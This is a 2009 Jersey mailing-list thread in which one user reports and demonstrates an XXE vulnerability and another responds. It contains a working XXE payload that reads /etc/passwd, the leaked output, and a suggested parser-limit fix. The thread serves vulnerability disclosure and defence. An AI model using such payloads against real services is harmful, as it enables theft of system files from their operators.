users@jersey.java.net

Re: [Jersey] Jersey vulnerable to XXE attack?

From: Tim McCune <tim_at_mccune.name>
Date: Mon, 6 Jul 2009 13:25:53 -0700

import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;

@Path("/")
public class MovieResource {
  ...
  @POST
  @Path("user/{id}/favoriteMovies")
  @Consumes({"application/xml", "application/json"})
  public FavoriteMovie addFavoriteMovie(@PathParam("id") Long id,
                                        FavoriteMovie movie) {
    // Echoes the unmarshalled entity straight back, which is why the
    // expanded entity text shows up in the response below.
    return movie;
  }
}

import javax.xml.bind.annotation.XmlRootElement;

@XmlRootElement
public class FavoriteMovie {
  private String _title;
  public String getTitle() {
    return _title;
  }
  public void setTitle(String title) {
    _title = title;
  }
}

If I POST the following XML:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<favoriteMovie><title>&xxe;</title></favoriteMovie>

I get back:
<favoriteMovie>
  <title>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
  </title>
</favoriteMovie>

Adding a
System.setProperty("entityExpansionLimit", "0");
fixes the problem, and causes this exception instead:
org.xml.sax.SAXParseException: The parser has encountered more than "0"
entity expansions in this document; this is the limit imposed by the
application.

On Mon, Jul 6, 2009 at 1:01 PM, Guba, Nicolai <nguba_at_bioware.com> wrote:

> I could not reproduce it. The JAXB serializer (correctly) identified
> this as an invalid request.
>
> Maybe it works with resources that are processing form parameters? It may
> be helpful to see the code snippet of the resource you are accessing.
>
> --
>
> =NPG=
>
> *From:* ksuwildcat_at_gmail.com [mailto:ksuwildcat_at_gmail.com] *On Behalf Of* Tim McCune
> *Sent:* Monday, July 06, 2009 1:04 PM
> *To:* users_at_jersey.dev.java.net
> *Subject:* [Jersey] Jersey vulnerable to XXE attack?
>
> http://www.securiteam.com/securitynews/6D0100A5PU.html
>
> Just tried this attack against a simple web service built on top of Jersey,
> and it seems to have succeeded.
>
> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
> <foo><bar>&xxe;</bar></foo>
>
> If I POST that to a web service built on Jersey, and have my resource just
> return the parameter that was passed into it, I can see the contents of
> /etc/passwd.
>
> Can anyone confirm that this vulnerability exists, and if so, advise on the
> best way to protect against it?
>